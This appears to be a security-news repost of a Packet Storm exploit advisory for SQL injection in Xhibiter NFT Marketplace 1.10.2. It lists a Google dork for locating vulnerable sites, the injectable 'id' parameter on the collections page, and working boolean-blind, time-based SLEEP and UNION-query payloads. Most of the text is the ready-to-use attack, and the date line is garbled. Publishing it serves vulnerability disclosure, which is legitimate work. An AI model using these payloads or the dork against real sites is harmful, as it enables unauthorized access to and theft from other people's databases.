Security
Headlines
HeadlinesLatestCVEs

Headline

Xhibiter NFT Marketplace 1.10.2 SQL Injection

Xhibiter NFT Marketplace version 1.10.2 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#google#linux#auth
# Exploit Title: xhibiter nft marketplace SQLI# Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"# Date: 29/06/204# Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/# Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA# Version: 1.10.2# Tested on: linux # CVE : [if applicable]on this dir https://localhost/collections?id=2xhibiter nft marketplace suffers from SQLI ---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa    Type: UNION query    Title: MySQL UNION query (NULL) - 36 columns    Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution